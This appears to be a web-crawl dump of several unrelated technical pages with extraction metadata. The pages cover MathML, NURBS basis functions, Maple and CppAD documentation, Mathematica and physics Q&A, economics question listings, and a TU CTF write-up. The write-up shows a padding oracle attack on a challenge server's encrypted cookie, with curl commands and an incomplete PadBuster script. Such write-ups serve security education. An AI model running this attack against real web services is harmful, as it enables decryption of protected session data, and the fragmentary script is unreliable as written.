where $$\bar P^ +$$ and $$\bar P^ -$$ denote the predicted probability of choosing the selfish option on trials in which the selfish option was actually chosen and on trials in which the pro-social option was actually chosen, respectively. Thus, λ[0,1] reflects how much of the choice variation across trials is captured by the model. λ = 1 indicates that the model can perfectly predict choice outcomes, while λ = 0 indicates that the model predicts decisions at chance.
|
2023-01-30 03:01:27
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6036538481712341, "perplexity": 1958.5200068249335}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499790.41/warc/CC-MAIN-20230130003215-20230130033215-00780.warc.gz"}
|
http://www.maa.org/external_archive/joma/Volume7/Siegrist/BasicMath.xhtml?device=mobile
|
# A Basic Article with MathML
#### Abstract
This article shows how to combine XHTML for basic exposition and MathML for mathematical expressions. This document can be used as a basic template, along with the files in the list below.
#### Keywords
• XHTML
• MathML
• CSS
• JavaScript
• document object model
• mathematical documents
## 1. Introduction
This is a compound XML document that includes basic exposition in XHTML (the rigorous, XML version of HTML) and MathML (the Mathematics Markup Language) for mathematical expressions. Both of these markup languages are W3C standards, although currently only the Firefox browser supports them in native form. Nonetheless, compound documents like this are the future of mathematics on the web.
Recall that the first part of a compound XML document contains declarations about the type of XMLs used, the document type definition, and other information. A document with MathML should be saved with extension xhtml, and should have the following initial declarations:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE math PUBLIC "-//W3C//DTD MathML 2.0//EN"
"-//W3C//DTD MathML 2.0//EN" "http://www.w3.org/Math/DTD/mathml2/mathml2.dtd">
<?xml-stylesheet type="text/xsl" href="mathml.xsl"?>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
You don't really have to understand what all this means, but if you're curious, the first line declares that this is an XML document and gives the version and encoding. The second line declares that this is a compound document with MathML, and gives a link to a document type definition (DTD), The third line gives a references to an XSL style sheet which is necessary for content MathML (more about that later), and finally the html tag gives a reference to a namespace.
## 2. MathML
MathML comes in two flavors: Presentation MathML and Content MathML. Both versions encode a great deal about the structure of the mathematical expressions. We do not intend to give a tutorial of MathML in this article (see the resources for that). Rather, we will give a few examples that illustrate what MathML can do.
First, however, you will need to download the MathML style sheets listed in the table of contents and put them in your document directory. The last of these, ctop.xsl is only needed for Content MathML and hence can be omitted if you are just going to use presentation MathML.
#### Example 1
The roots of the quadratic equation $a{x}^{2}+bx+c=0$ are given by
$x=\frac{-b±\sqrt{{b}^{2}-4ac}}{2a}$
The mathematical expressions in this example are written in Presentation MathML. The source code for the second expression is given below. Even though MathML is quite verbose, you can probably figure out what each tag does.
<math xmlns="http://www.w3.org/1998/Math/MathML" display="block">
<mrow>
<mi>x</mi><mo>=</mo>
<mfrac>
<mrow>
<mo>-</mo><mi>b</mi><mo>±</mo>
<msqrt>
<msup>
<mi>b</mi><mn>2</mn>
</msup>
<mo>-</mo>
<mn>4</mn><mo>⁢</mo><mi>a</mi><mo>⁢</mo><mi>c</mi>
</msqrt>
</mrow>
<mrow>
<mn>2</mn><mo>⁢</mo><mi>a</mi>
</mrow>
</mfrac>
</mrow>
[/itex]
#### Example 2
The following integral is important in the study of normal probability distributions, error functions, and other areas:
$\int_{-\infty }^{\infty } e^{-1/2z^{2}}\,d z=\sqrt{2\pi }$
This example is written in Content MathML; the source code is given below. Again, even though the language is verbose, you can probably figure out what each tag does.:
<math xmlns="http://www.w3.org/1998/Math/MathML" display="block">
<apply><eq />
<apply><int />
<bvar><ci>z</ci></bvar>
<lowlimit>
<apply><minus />
<infinity />
</apply>
</lowlimit>
<uplimit><infinity /></uplimit>
<apply><exp />
<apply><times />
<apply><minus />
<cn type="rational">1<sep />2</cn>
</apply>
<apply><power />
<ci>z</ci>
<cn>2</cn>
</apply>
</apply>
</apply>
</apply>
<apply><root />
<apply><times />
<cn>2</cn>
<pi />
</apply>
</apply>
</apply>
[/itex]
|
2015-07-08 00:10:40
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 3, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4815644323825836, "perplexity": 2407.2359526138634}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-27/segments/1435375635143.91/warc/CC-MAIN-20150627032715-00269-ip-10-179-60-89.ec2.internal.warc.gz"}
|
https://www.gamedev.net/forums/topic/564775-nurbs-basis-functions/
|
NURBS basis functions
This topic is 3043 days old which is more than the 365 day threshold we allow for new replies. Please post a new topic.
Recommended Posts
Hi everyone, I'm having trouble understanding the basis functions required to calculate a NURBS surface. On wikipedia, the calculation is defined here: http://en.wikipedia.org/wiki/NURBS#Construction_of_the_basis_functions_.5B3.5D as: Ni,n = fi,nNi,n − 1 + gi + 1,nNi + 1,n − 1 However, since the calculation for Ni,n involves seemingly already knowing Ni,n I am confused. It seems like circular logic to me. Could anyone please help me understand the basis function? I understand Ni,n(u) is the value for the basis function for control point i of degree n for time value u. But I do not understand the full calculation: Ni,n = fi,nNi,n − 1 + gi + 1,nNi + 1,n − 1 I'd really appreciate a hint or explanation of how to do this calculation. Specifically given i,n and u, how do I calculate Ni,n(u)? Best Regards, David
Share on other sites
I've no experience with NURBS in general but noone else has answered so hopefully just looking at this mathematically will help.
They key point is that the equation is Recursive:
$N_{i,n} = f_{i,n} N_{i,n-1} + g_{i+1,n} N_{i+1,n-1}$
$N_{i,n}$ is only dependent on $N_{i,n-1}$ and $N_{i+1,n-1}$
So since you are given that at n=0 $N_{j,0}$ is piecewise constant you can calculate $N_{j,1}$.
Page 4 of
http://libnurbs.sourceforge.net/nurbsintro.pdf
gives a better explanation and more explicit information on what the function N actually is where n=0.
p.s. I am a mathematician by training not a computer scientist so apologies if the explanation is overly mathematical.
Share on other sites
Thanks very much - apologies for the late reply.
But that's exactly what I needed - once I understood the function as recursive it was straightforward.
Thanks again :)
David
1. 1
2. 2
Rutin
24
3. 3
4. 4
JoeJ
18
5. 5
• 14
• 22
• 11
• 11
• 9
• Forum Statistics
• Total Topics
631766
• Total Posts
3002221
×
|
2018-07-21 06:27:18
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 6, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.543052613735199, "perplexity": 1461.1039926360074}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676592387.80/warc/CC-MAIN-20180721051500-20180721071500-00006.warc.gz"}
|
https://www.maplesoft.com/support/help/maple/view.aspx?path=Statistics%2FStandardError
|
Statistics - Maple Programming Help
Home : Support : Online Help : Statistics and Data Analysis : Statistics Package : Quantities : Statistics/StandardError
Statistics
StandardError
estimate standard error of a sampling distribution
Calling Sequence StandardError(S, A, ds_options) StandardError[N](S, X, rv_options)
Parameters
S - name; statistic A - N - positive integer; sample size X - algebraic; random variable or distribution ds_options - (optional) equation(s) of the form option=value where option is one of ignore or weights; specify options for computing the standard error for a data set rv_options - (optional) equation of the form numeric=value; specifies options for computing the standard error for a random variable
Description
• The StandardError function computes the standard error of the sampling distribution of the specified statistic. For example, the standard error of the sample mean of $n$ observations is $\frac{\mathrm{\sigma }}{\sqrt{n}}$, where ${\mathrm{\sigma }}^{2}$ is the variance of the original observations. Standard errors are particularly important in the large class of cases when the sampling distribution can be taken to be normal either exactly or to an adequate degree of approximation. Standard error can be computed either for a particular data set or for a random variable.
• In the data set case the sample size and all the relevant parameters (such as mean, standard deviation, etc.) will be estimated based on the specified data. All computations are performed under the assumption that the underlying sampling distribution is approximately normal.
In the random variable case, N is the sample size.
• The first parameter S is the name of a standard quantity applied to either a data set or random variable, e.g. Statistics[Mean], Statistics[Median], Statistics[Variance]. See Statistics[DescriptiveStatistics] for a complete list of quantities.
• The second parameter can be a data set (e.g., a Vector), a Matrix data set, a distribution (see Statistics[Distribution]), a random variable, or an algebraic expression involving random variables (see Statistics[RandomVariable]).
Computation
• By default, all computations involving random variables are performed symbolically (see option numeric below).
• All computations involving data are performed in floating-point; therefore, all data provided must have type/realcons and all returned solutions are floating-point, even if the problem is specified with exact values.
Data Set Options
The ds_options argument can contain one or more of the options shown below. More information for some options is available in the Statistics[DescriptiveStatistics] help page. All unprocessed options will be passed to the corresponding Statistics[DescriptiveStatistics] command.
• ignore=truefalse -- This option controls how missing data is handled by the StandardError command. Missing items are represented by undefined or Float(undefined). So, if ignore=false and A contains missing data, the StandardError command will return undefined. If ignore=true all missing items in A will be ignored. The default value is false.
• weights=Vector -- Data weights. The number of elements in the weights array must be equal to the number of elements in the original data sample. By default all elements in A are assigned weight $1$.
Random Variable Options
The rv_options argument can contain one or more of the options shown below. More information for some options is available in the Statistics[RandomVariables] help page. All unprocessed options will be passed to the corresponding Statistics[DescriptiveStatistics] command.
• numeric=truefalse -- By default, the standard error is computed using exact arithmetic. To compute the standard error numerically, specify the numeric or numeric = true option.
Examples
> $\mathrm{with}\left(\mathrm{Statistics}\right):$
Find the Standard Error of the mean on a sample drawn from the normal distribution.
> $N≔\mathrm{RandomVariable}\left(\mathrm{Normal}\left(0,1\right)\right):$
> $S≔\mathrm{Sample}\left(N,{10}^{3}\right):$
> ${\mathrm{StandardError}}_{{10}^{3}}\left(\mathrm{Mean},N,\mathrm{numeric}\right)$
${0.03162277660}$ (1)
> $\mathrm{StandardError}\left(\mathrm{Mean},S\right)$
${0.0313121441956369}$ (2)
> $\mathrm{Bootstrap}\left('\mathrm{Mean}',S,\mathrm{replications}={10}^{3},\mathrm{output}=\mathrm{standarderror}\right)$
${0.0296068781774789132}$ (3)
> $\mathrm{Bootstrap}\left('\mathrm{Mean}',N,\mathrm{replications}={10}^{3},\mathrm{output}=\mathrm{standarderror},\mathrm{samplesize}={10}^{3}\right)$
${0.0313950353171498359}$ (4)
> $\mathrm{μ}≔\mathrm{Mean}\left(S\right)$
${\mathrm{\mu }}{≔}{0.0611270855668661}$ (5)
> $\mathrm{σ}≔\mathrm{StandardDeviation}\left(S\right)$
${\mathrm{\sigma }}{≔}{0.990176940818334}$ (6)
> ${\mathrm{StandardError}}_{{10}^{3}}\left(\mathrm{Mean},\mathrm{Normal}\left(\mathrm{μ},\mathrm{σ}\right),\mathrm{numeric}\right)$
${0.0313121441956369}$ (7)
Consider the following Matrix data set.
> $M≔\mathrm{Matrix}\left(\left[\left[3,1130,114694\right],\left[4,1527,127368\right],\left[3,907,88464\right],\left[2,878,96484\right],\left[4,995,128007\right]\right]\right)$
${M}{≔}\left[\begin{array}{ccc}{3}& {1130}& {114694}\\ {4}& {1527}& {127368}\\ {3}& {907}& {88464}\\ {2}& {878}& {96484}\\ {4}& {995}& {128007}\end{array}\right]$ (8)
We compute the standard error of the interquartile range of each of the columns, and the standard error of the second moments of the columns with respect to different origins.
> $\mathrm{StandardError}\left(\mathrm{InterquartileRange},M\right)$
$\left[\begin{array}{ccc}{0.668070576628882}& {188.309251368715}& {15668.6416411933}\end{array}\right]$ (9)
> $\mathrm{StandardError}\left(\mathrm{Moment},M,2,\mathrm{origin}=\left[3,1000,100000\right]\right)$
$\left[\begin{array}{ccc}{0.219089023002066}& {47944.4484082151}& {1.44602293933851}{}{{10}}^{{8}}\end{array}\right]$ (10)
Compatibility
• The A parameter was updated in Maple 16.
|
2020-01-23 06:39:08
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 27, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8771898746490479, "perplexity": 789.7507333441737}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579250608295.52/warc/CC-MAIN-20200123041345-20200123070345-00397.warc.gz"}
|
http://mathematica.stackexchange.com/questions/44507/about-making-a-fraction-taller
|
About making a fraction “taller” [duplicate]
I encountered 2 problema with displaying formula in text format.
• The variables in the formula is italic, I want to change them to normal.
• And the fraction size is too small, I want to make it to full size.
Should I edit the stylesheet? What exactly should I do?
-
marked as duplicate by Kuba, rasher, Artes, m_goldberg, Sjoerd C. de VriesMar 22 '14 at 12:34
Take a look at: Any way to make my equations look better, more Latex like?. There is a lot of information you may find useful. Or preventing TraditionalForm from getting “squished” – Kuba Mar 22 '14 at 8:16
Well, the closers beat me to an answer not contained in the linked "duplicates", which do not address the issue of italics (traditionally, variables are supposed to be in italics): Edit the stylesheet, choose the style Text, and set these options with the Format > OptionInspector: DefaultInlineFormatType->StandardForm, FractionBoxOptions->{AllowScriptLevelChange->False}. Next, you might want to set the font for "InlineCell" by entering the style name InlineCell and setting its font. (Assuming your text is in a Text cell.) – Michael E2 Mar 22 '14 at 12:52
Give this a try:
Row[{
"1.",
Invisible["space"],
"(a)",
Invisible["space"],
"Find ",
}]
which produces:
and this:
Row[{
"2.",
Invisible["space"],
"(a)",
Invisible["space"],
"Find ",
|
2015-01-25 16:29:47
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.48155277967453003, "perplexity": 4242.76449422778}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-06/segments/1422115900160.86/warc/CC-MAIN-20150124161140-00222-ip-10-180-212-252.ec2.internal.warc.gz"}
|
https://www.coin-or.org/CppAD/Doc/ta_delete_array.htm
|
Deallocate An Array and Call Destructor for its Elements
Syntax
thread_alloc::delete_array(array) .
Purpose
Returns memory corresponding to an array created by (create by create_array ) to the available memory pool for the current thread.
Type
The type of the elements of the array.
array
The argument array has prototype Type* array It is a value returned by create_array and not yet deleted. The Type destructor is called for each element in the array.
The current thread must be the same as when create_array returned the value array . There is an exception to this rule: when the current execution mode is sequential (not parallel ) the current thread number does not matter.
Delta
The amount of memory inuse will decrease by delta , and the available memory will increase by delta , where delta is the same as for the corresponding call to create_array.
Example
|
2018-01-19 13:49:17
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2161569595336914, "perplexity": 1656.4353592179432}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084887981.42/warc/CC-MAIN-20180119125144-20180119145144-00265.warc.gz"}
|
https://physics.stackexchange.com/questions/568520/special-relativity-interpretation-of-the-partial-derivate-of-stress-energy-tens
|
# Special Relativity: Interpretation of the partial derivate of Stress-Energy Tensor
This question is based on Carroll's book Spacetime and Geometry, specifically from page 33 to page 36.
In the upper mentioned section we define the Stress-Energy Tensor as:
The flux of the four momentum $$p^\mu$$ across a surface of constant $$x^\nu$$
Here lies the first problem: canonically the flux of a vector across a surface is a scalar, not a matrix or a tensor. So I don't get this definition at all.
But nevertheless I understand that the Stress-Energy Tensor represent a generalization of the concept of mass and energy, so we can move forward for now. We then get the form of the Stress-Energy Tensor for a perfect fluid: $$T^{\mu\nu}=(\rho+p)U^\mu U^\nu+p\eta^{\mu\nu}$$ (where $$\rho$$ is the energy density, $$p$$ si the pressure and $$U$$ is the four-velocity; keep in mind that we are working in flat spacetime). This is fine for me, however then we come to the following expression: $$\partial _\mu T^{\mu\nu}=0$$ It is stated that the $$\nu=0$$ component corresponds to the conservation of energy and the other three components correspond to the conservation of momentum; but no direct proof, or justification, of this statement is given. Using the definition of $$T^{\mu\nu}$$ previously cited: how can we show that the upper mentioned statement is true, or at least plausible?
• I don't understand your comment "canonically the flux of a vector across a surface is scalar...". See en.wikipedia.org/wiki/… and compare to en.wikipedia.org/wiki/Flux#Flux_as_a_surface_integral. Are you mixing the two definitions? For the former, the "scalar" case is a very special case. – Brick Jul 27 '20 at 18:11
• Secondly, this seems like two distinct questions to me. Really you should ask one question at a time, and the second one, at least, probably has an answer somewhere on this site already. – Brick Jul 27 '20 at 18:13
The fundamental tensor equation of relativistic mechanics of continous matter is $$K^\mu = \partial_\mu T^{\mu\nu}$$ where $$K^\mu$$ is the 4-force-density acting on material medium and $$T^{\mu\nu}$$ is the energy-momentum-stress tensor of the system. Consistently for $$\nu=0$$ we obtain the equation of continuity and for $$\nu=1,2,3$$ the 3-vector equation of motion. Of course, in absence of external forces ($$K^\mu=0$$), the scalar relation corresponds to conservation of energy and the vector relation becomes the law of conservation of linear momentum.
|
2021-06-20 23:07:22
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 15, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9214457273483276, "perplexity": 205.61023747332118}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488257796.77/warc/CC-MAIN-20210620205203-20210620235203-00211.warc.gz"}
|
https://grocid.net/2016/05/15/tu-ctf-pet-padding-inc/
|
# TU CTF – Pet Padding Inc.
A web challenge worth 150 points, with description
We believe a rouge whale stole some data from us and hid it on this website. Can you tell us what it stole?
http://104.196.60.112/
Visiting the site, we see that there is a cookie `youCantDecryptThis`. Alright… lets try to fiddle with it.
We run the following command
`curl -v --cookie "youCantDecryptThis=aaaa" http://104.196.60.112/`
and we observe that there is an error which is not present compared to
when running it with the correct cookie is set, i.e.,
`curl -v --cookie "youCantDecryptThis=0KL1bnXgmJR0tGZ/E++cSDMV1ChIlhHyVGm36/k8UV/3rmgcXq/rLA==" http://104.196.60.112/`
Clearly, this is a padding error (actually, there is an explicit padding error warning but it is not shown by curl). OK, so decryption can be done by a simple padding oracle attack. This attack is rather simple to implement (basically, use the relation $P_i = D_K(C_i) \oplus C_{i-1}$ and the definition of PCKS padding, see the wikipedia page for a better explanation), but I decided to use PadBuster. The following (modified example) code finds the decryption:
```class PadBuster(PaddingOracle):
def __init__(self, **kwargs):
self.session = requests.Session()
self.wait = kwargs.get('wait', 2.0)
def oracle(self, data, **kwargs):
while 1:
try:
response = self.session.get('http://104.196.60.112',
stream=False, timeout=5, verify=False)
break
except (socket.error, requests.exceptions.RequestException):
logging.exception('Retrying request in %.2f seconds...', self.wait)
time.sleep(self.wait)
continue
self.history.append(response)
return
if __name__ == '__main__':
import logging
import sys
logging.basicConfig(level=logging.DEBUG)
The decrypted flag we get is `TUCTF{p4dding_bec4use_5ize_m4tt3rs}`!
|
2017-08-20 21:13:58
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 1, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.36283907294273376, "perplexity": 1974.5813527180403}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886106990.33/warc/CC-MAIN-20170820204359-20170820224359-00680.warc.gz"}
|
https://economics.stackexchange.com/questions?tab=newest&page=3
|
All Questions
8,813 questions
Filter by
Sorted by
Tagged with
23 views
Cardinal Voting, Incentive Compatibility and Secrecy
Is there any available/feasible/practical way to make a Cardinal Voting both Incentive Compatible and Secret? A method to make a cardinal voting incentive compatible would be to force them to put ...
17 views
Which market category does this sustainable product belong to?
I'm currently working on an assignment, which is making an export plan for a product aimed at Asia. However I can't define the market of my product. My product is basically an artificial riverbank; ...
22 views
What prevents a government to issue debt to finance riskier investment?
Germany's government has a 10Y bond yield of -0.336% (http://www.worldgovernmentbonds.com/country/germany/). Meanwhile, Brazil has a 10Y bond yield of 6.415% (http://www.worldgovernmentbonds.com/...
12 views
Economics of Health Textbook Recommendation
Was wondering if anyone who has taught a class on health economics could give some background on which textbook they used for their class and why. It seems like "Healthy Economics" by Bhattacharya, ...
26 views
Negative correlation conditional variance and return
I've estimated a GARCH for S&P 500, Nikkei and DAX index. The model for the return of S&P 500, the results indicate the return of DAX has an negative effect on the S&P 500 conditional ...
10 views
Why does Canada have only half the taxes of the UK in the OECD NTCP data?
This data sums taxes with healthcare contributions, private or not, so not surprisingly the US scores high on that measure. But why is Canada so suspiciously low? I mean Canada has less than half (11....
43 views
When everyone sells at an event of a recession, who buys?
I'm trying to walk through and understand the basic events of the great depression. I understand that at one point (Black Thursday) the news of a downfall of stock prices hit investors, so they ...
9 views
Forward Currency Exchange
Could anyone help me understand the forward bid and ask for PLN/RON for the next 3 months. I know : Bid - Ask EUR/RON 4,7261 - 4,7309 CAD/RON 3,2302 - 3,...
19 views
Linking creeping inflation to industrial revolution
The russian wiki on price revolution says Ползучая инфляция стала тем стимулом, который привёл в конечном итоге к промышленной революции, which translates to in the end result, the creeping inflation ...
41 views
What is equilibrium dependent upon in Generalized Second-Price Auctions?
Theory states that GSP auctions induce truthful bidding. Is it the case that this is true ONLY IF a) each of the bidders truthfully bids their value ($b_i = v_i$) (each bidder's optimal strategy) ...
38 views
Why can we write any lottery as a convex combination of the degenerate lotteries?
I know that a degenerate lottery is a lottery that yields outcome $n$ with probability $1$ and I also know the definition of convex combination: given $x_{1},x_{2}, \cdots ,x_{n} \in \mathbb{R}$, a ...
33 views
Modeling market growth, without compound interest or regression
I am working on predicting the growth of a certain market. Traditionally, this is done through a simple compound interest model: $$ThisYear'sMarket * (1 + g)^n$$ What would be a better way to ...
81 views
What's the opposite of a Pareto improvement called?
Wikipedia defines a Pareto Improvement, "given a certain initial allocation of goods among a set of individuals" as: a change to a different allocation that makes at least one individual or ...
33 views
What is 'repo' in banking
I keep hearing about repo rate etc. But this question is not what is the repo rate. It is: What is a definition of 'repo' ?
26 views
Question Regarding Equilibrium Price & Surplus
So here's an example of a standard Supply & Demand Relationship for an Individual Supplier: As a supplier, for 1 dollar, I'll produce 1 unit of something. For 2 dollars, I'll produce 2 units, for ...
44 views
How much do the concepts and methodologies of GDP, CPI, PPP overlap?
Indicators of greatest importance in macro-economics are: the gross domestic product (GDP → comparison and growth of wealth) the consumer price index (CPI → inflation rate) purchasing power parity (...
17 views
How to maximize total revenue on constant elasticy curve
So to maximize total revenue, we sell at the price on the demand elasticity curve where elasticity=1 right? Lets say on one curve, the elasticity throughout the curve is equal to 1.5? How much should ...
16 views
Papers on the rate of returns for government-run pension plans
I'm looking for papers studying the implied rate of return for various government pension programs around the world. Both historical and expected returns. Or any study that looks at the taxes for the ...
21 views
Meaning of Exchange rate
Does exchange rate of local currency relative to US dollar mean LOC/USD or USD/LOC ?
62 views
What could be an example of equity-efficiency tradeoff in healthcare, social protection or defense? For environment I did think of pollution permits that can cause geographical differences in ...
63 views
Does quasi-concave utility function imply convex indifference curve?
It is well-known that convex indifference curve (i.e. the function is convex)/ preference would imply quasi-concave utility function. But does quasi-concave utility function imply convex indifference ...
19 views
How does definition of “price equilibrium with transfer” also include the case for the definition of “walrasian equilibrium”?
According to MWG and this answer, walrasian equilibrium is a special case of price equilibrium with transfers. However, since wealth distribution is predetermined in walrasian equilibrium, would it ...
27 views
Congruence of GDP as calculated by production and by consumption
Here I've read the following (translated by Google) GDP can be calculated in two ways: firstly, by origin, that is, by estimating the value of all goods and services produced, and secondly by ...
34 views
Why does average variable cost = marginal cost for this function?
I was hoping someone could explain the following. Suppose the short-run total cost function is TC = 50 + 12Q. Which of the following statements is true at all levels of production? The correct answer ...
14 views
Labor Economy Question [closed]
Assume skilled TRNC citizens have a relatively easy access to the job markets in UK, EU, Australia and Canada, while the access of unskilled TRNC citizens to those markets is more limited and wages in ...
Utility function $u(x)$ is monotonic. I want to prove that $u(x)$ exhibits risk aversion if and only if for all lottery $F$: $E(x) \geq CE(F,u)$ (CE is certainty equivalent). (Definition of $CE$: the ...
|
2019-11-19 00:52:38
|
